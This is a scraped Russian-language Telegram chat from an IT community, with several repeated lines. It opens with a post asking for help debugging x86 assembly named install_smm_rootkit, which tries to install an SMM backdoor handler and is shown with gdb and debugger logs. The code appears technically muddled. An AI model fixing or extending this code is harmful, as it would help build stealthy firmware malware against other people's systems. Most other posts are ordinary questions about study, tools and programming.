global install_smm_rootkit
install_smm_rootkit:
mov ecx, 0x9E
rdmsr
mov [original_smi_handler], eax
mov eax, w_smi_handler
wrmsr
mov eax, 0xDEADBEEF
mov [trigger_address], eax
mov dx, 0xB2
mov al, 0xFE
out dx, al
ret
здравствуйте! ассемблер х86. обработчик не вызывается, бекдор устанавливается но не активируется. система выполняет стандартный обработчик а не мой.
логи
SMI: Handling SMI# 0xFE at vector 0x38
SMI: CPU0 entering SMM at 0x7E0000
SMI: CPU0 exiting SMM, total time 112us
SMI: Handler for code 0xFE completed successfully
динамический анализ
(gdb) x/10i install_smm_rootkit
0x7fffe001: mov $0x9e,%ecx
0x7fffe007: rdmsr
0x7fffe009: mov %eax,0x7fffe100
0x7fffe00e: mov $0x7fffe200,%eax
0x7fffe013: wrmsr
0x7fffe015: mov $0xdeadbeef,%eax
0x7fffe01a: mov %eax,0x7fffe104
0x7fffe01f: mov $0xb2,%dx
0x7fffe023: mov $0xfe,%al
0x7fffe025: out %al,(%dx)
(gdb) p /x $al
$1 = 0xfe
(gdb) si
отладчик
SMM_Debug: SMI# 0xFE triggered by I/O write to 0xB2
SMM_Debug: Executing default handler for SMI code 0xFE
SMM_Debug: Default handler: system maintenance
SMM_Debug: SMI processing completed, RSM executed
не понимаю где ошибка, может кто поможет? там, где спрашивал, к сожалению, проблему не нашли. гипотезы о регистрации в неправильном мср и неправильного адреса обработчика исключены
install_smm_rootkit:
mov ecx, 0x9E
rdmsr
mov [original_smi_handler], eax
mov eax, w_smi_handler
wrmsr
mov eax, 0xDEADBEEF
mov [trigger_address], eax
mov dx, 0xB2
mov al, 0xFE
out dx, al
ret
здравствуйте! ассемблер х86. обработчик не вызывается, бекдор устанавливается но не активируется. система выполняет стандартный обработчик а не мой.
логи
SMI: Handling SMI# 0xFE at vector 0x38
SMI: CPU0 entering SMM at 0x7E0000
SMI: CPU0 exiting SMM, total time 112us
SMI: Handler for code 0xFE completed successfully
динамический анализ
(gdb) x/10i install_smm_rootkit
0x7fffe001: mov $0x9e,%ecx
0x7fffe007: rdmsr
0x7fffe009: mov %eax,0x7fffe100
0x7fffe00e: mov $0x7fffe200,%eax
0x7fffe013: wrmsr
0x7fffe015: mov $0xdeadbeef,%eax
0x7fffe01a: mov %eax,0x7fffe104
0x7fffe01f: mov $0xb2,%dx
0x7fffe023: mov $0xfe,%al
0x7fffe025: out %al,(%dx)
(gdb) p /x $al
$1 = 0xfe
(gdb) si
отладчик
SMM_Debug: SMI# 0xFE triggered by I/O write to 0xB2
SMM_Debug: Executing default handler for SMI code 0xFE
SMM_Debug: Default handler: system maintenance
SMM_Debug: SMI processing completed, RSM executed
не понимаю где ошибка, может кто поможет? там, где спрашивал, к сожалению, проблему не нашли. гипотезы о регистрации в неправильном мср и неправильного адреса обработчика исключены
Есть тут кто учится на бизнес информатике? Как там с программированием, не слишком мало?
Есть вообще смысл поступать на это направление?
Есть вообще смысл поступать на это направление?
Даров, родные, темка следующая — узнав от кента про то, что в нашей необьятной практикуют систему белых списков, созрел вопрос: а как, собсна эти белые списки в перспективе можно будет обходить?
Через дыры в разрешенных сервисах? Или искать альтернативные каналы связи?
Я, если честно, в политоте полный ноль и все новости до меня докатились только дня два-три назад, а кент как раз пророчит чуть ли не кванмён два дот ноль. Он, кстати, в политике столько же, сколько в интернете впринципе, поетому оснований верить у меня много, но в этот раз почему-то не особо хочется...
Через дыры в разрешенных сервисах? Или искать альтернативные каналы связи?
Я, если честно, в политоте полный ноль и все новости до меня докатились только дня два-три назад, а кент как раз пророчит чуть ли не кванмён два дот ноль. Он, кстати, в политике столько же, сколько в интернете впринципе, поетому оснований верить у меня много, но в этот раз почему-то не особо хочется...
💋2
This media is not supported in your browser
VIEW IN TELEGRAM
Какая есть альтернатива Cloudflare? заебало уже постоянно считатся с их сбоями, в техподдержке как обычно либо нейронка, либо индус и оба невдупляют нихуя
💋7
Всем привет! Ищем двух человек для участия в геймджеме в Алмате! Ивент проходит оффлайн, поэтому нужны люди только из этого города. Один человек умеет чуть-чуть работать в годот, я же нулевая(сейчас изучаю с#). Мы идём чисто ради опыта и веселья, не ради победы
Пишите в анонку. Если есть вопросы, то задавайте http://t.me/anonaskbot?start=2hbce
Пишите в анонку. Если есть вопросы, то задавайте http://t.me/anonaskbot?start=2hbce
Telegram
Анонимные сообщения
Бот для получения анонимных сообщений в Телеграме
Тех. поддержка бота — @botomanager
Тех. поддержка бота — @botomanager
👍2💋1
Hola, ребята, я собираюсь поступать на менеджера связанного с IT
Мне бы хотелось, что бы меня чему то научили. Сами понимаете, по школьной программе далеко не уедешь.
Можем перейти в лс, что хотите, но научите меня чему то классному и полезному
Неанон Лиша
Мне бы хотелось, что бы меня чему то научили. Сами понимаете, по школьной программе далеко не уедешь.
Можем перейти в лс, что хотите, но научите меня чему то классному и полезному
Неанон Лиша
💋2
Янезнаю, мне очень нужен человек, который поможет разобраться в С# в юнити. У меня уже голова трещит, конкурсы насилуют....
@mariyakhrest
@mariyakhrest
❤2
Вот когда-то ставил себе кали и пользовался всеми инструментами, потому что реально была надобность. Потом как-то (уже 18 дней) прекратил быть членом воланта. Так у меня кали линукс и остался. Но вот теперь я чувствую себя как чмо какое-то. Типа установил для понтов. Но на самом деле оно свою надобность изжило. Я слишком ленив для перехода туда сюда
Я надеюсь, я такой не один?!
Я надеюсь, я такой не один?!
💘2💋1
доброго времени суток всем
есть ли среди вас ребята, которые имели дело с русификаторами/у которых есть материалы по этой теме? если кто-то таким занимался, поделитесь опытом или материалами, пожалуйста
есть ли среди вас ребята, которые имели дело с русификаторами/у которых есть материалы по этой теме? если кто-то таким занимался, поделитесь опытом или материалами, пожалуйста
💋3💘2
Помогите пж собирался подключить залежавшийся дисплей а получил говно на блюде
Третий раз переподключаю и он тупо либо сериал порт не читает либо пины путает
Или я пины путаю
В общем на резисторы кроме потенциометра внимание не обращайте они там с прошлой хрени
Третий раз переподключаю и он тупо либо сериал порт не читает либо пины путает
Или я пины путаю
В общем на резисторы кроме потенциометра внимание не обращайте они там с прошлой хрени
💘8😭6❤4
посоветуйте хорошие тренажёры для практики SQL. именно тренажёры, без теории. желательно начального уровня
💋2🥰1💘1
Здрасте, хотел спросить, есть ли разница в расположении def x() в python? Лучше делать после всего основного кода или до него
Привет, конфа! Небольшой опрос от меня. Появился очень интересный вопрос из-за того, как сейчас используется ИИ в айти и то, что вашу работу по сути ИИ может заменить.
Вы боитесь этого? Вы верите, что вашу работу заберёт ИИ в скором времени?
Вы боитесь этого? Вы верите, что вашу работу заберёт ИИ в скором времени?
короч, не знаю, какой адекватный тейк можно придумать, чтоб конфа не пустовала, поэтому ловите следующий прикол:
отвечаем в комментах, господа..
думаю, этот тейк будет полезен новым шкетам. И да, дорогие читающие, щас же выпрямились, собаки сутулые
Если б вы вернулись вы вернулись в свой первый день погружения в CS, то с чего бы вы начали? (ЯП, стек, технологии, направления, прочее)
отвечаем в комментах, господа..
думаю, этот тейк будет полезен новым шкетам. И да, дорогие читающие, щас же выпрямились, собаки сутулые
💘3💋1